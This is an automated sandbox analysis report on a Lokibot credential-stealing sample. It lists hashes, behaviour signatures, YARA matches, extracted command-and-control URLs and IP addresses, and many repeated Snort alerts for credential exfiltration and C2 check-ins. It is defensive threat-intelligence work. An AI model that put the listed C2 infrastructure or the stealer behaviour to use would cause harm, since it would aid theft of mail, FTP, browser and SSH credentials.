Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report __.exe

Overview

General Information

Sample Name:__.exe
Analysis ID:553072
MD5:e9b74bfb67bf3dcef39e23674d4dd63f
SHA1:6fc16b7fe6e2d6567bfd2cf68b407fc7f5097a93
SHA256:aeff0c4823c37fc2054f80c6bf7dafcf7fce8abb84d7b72a08fa67411d2aa480
Tags:exeLoki
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Lokibot
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • __.exe (PID: 7040 cmdline: "C:\Users\user\Desktop\__.exe" MD5: E9B74BFB67BF3DCEF39E23674D4DD63F)
    • __.exe (PID: 5768 cmdline: "C:\Users\user\Desktop\__.exe" MD5: E9B74BFB67BF3DCEF39E23674D4DD63F)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.553223743.00000000007A7000.00000004.00000020.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
          00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmpLoki_1Loki Payloadkevoreilly
          • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
          • 0x153fc:$a2: last_compatible_version
          Click to see the 38 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.0.__.exe.400000.6.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            3.0.__.exe.400000.6.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              3.0.__.exe.400000.6.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                3.0.__.exe.400000.6.raw.unpackLoki_1Loki Payloadkevoreilly
                • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
                • 0x153fc:$a2: last_compatible_version
                3.0.__.exe.400000.6.raw.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
                • 0x13bff:$des3: 68 03 66 00 00
                • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
                • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
                Click to see the 82 entries

                Sigma Overview

                No Sigma rule has matched

                Jbx Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
                Multi AV Scanner detection for submitted fileShow sources
                Source: __.exeVirustotal: Detection: 34%Perma Link
                Source: __.exeReversingLabs: Detection: 39%
                Antivirus detection for URL or domainShow sources
                Source: http://slimpackage.com/slimmain/five/fre.php3Avira URL Cloud: Label: malware
                Source: http://slimpackage.com/slimmain/five/fre.phpAvira URL Cloud: Label: malware
                Multi AV Scanner detection for domain / URLShow sources
                Source: slimpackage.comVirustotal: Detection: 5%Perma Link
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Local\Temp\nsjD69.tmp\firfslz.dllVirustotal: Detection: 13%Perma Link
                Machine Learning detection for sampleShow sources
                Source: __.exeJoe Sandbox ML: detected
                Source: 3.0.__.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
                Source: __.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                Source: Binary string: wntdll.pdbUGP source: __.exe, 00000002.00000003.291276471.00000000030A0000.00000004.00000001.sdmp, __.exe, 00000002.00000003.292633393.0000000003230000.00000004.00000001.sdmp
                Source: Binary string: wntdll.pdb source: __.exe, 00000002.00000003.291276471.00000000030A0000.00000004.00000001.sdmp, __.exe, 00000002.00000003.292633393.0000000003230000.00000004.00000001.sdmp
                Source: C:\Users\user\Desktop\__.exeCode function: 2_2_00405D7C FindFirstFileA,FindClose,
                Source: C:\Users\user\Desktop\__.exeCode function: 2_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
                Source: C:\Users\user\Desktop\__.exeCode function: 2_2_00402630 FindFirstFileA,
                Source: C:\Users\user\Desktop\__.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49743 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49743 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49743 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49744 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49744 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49744 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49745 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49745 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49745 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49746 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49746 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49746 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49747 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49747 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49747 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49748 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49748 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49748 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49749 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49749 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49749 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49750 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49750 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49750 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49751 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49751 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49751 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49752 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49752 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49752 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49753 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49753 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49753 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49754 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49754 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49754 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49755 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49755 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49755 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49758 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49758 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49758 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49759 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49759 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49759 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49760 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49760 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49760 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49761 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49761 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49761 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49762 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49762 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49762 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49763 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49763 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49763 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49764 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49764 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49764 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49765 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49765 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49765 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49766 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49766 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49766 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49767 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49767 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49767 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49769 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49769 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49769 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49770 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49770 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49770 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49771 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49771 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49771 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49772 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49772 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49772 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49781 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49781 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49781 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49791 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49791 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49791 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49809 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49809 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49809 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49810 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49810 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49810 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49811 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49811 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49811 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49817 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49817 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49817 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49818 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49818 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49818 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49819 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49819 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49819 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49821 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49821 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49821 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49822 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49822 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49822 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49830 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49830 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49830 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49837 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49837 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49837 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49844 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49844 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49844 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49848 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49848 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49848 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49849 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49849 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49849 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49851 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49851 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49851 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49852 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49852 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49852 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49853 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49853 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49853 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49854 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49854 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49854 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49855 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49855 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49855 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49856 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49856 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49856 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49857 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49857 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49857 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49858 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49858 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49858 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49859 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49859 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49859 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49860 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49860 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49860 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49861 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49861 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49861 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49862 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49862 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49862 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49863 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49863 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49863 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49864 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49864 -> 104.223.93.105:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49864 -> 104.223.93.105:80
                C2 URLs / IPs found in malware configurationShow sources
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
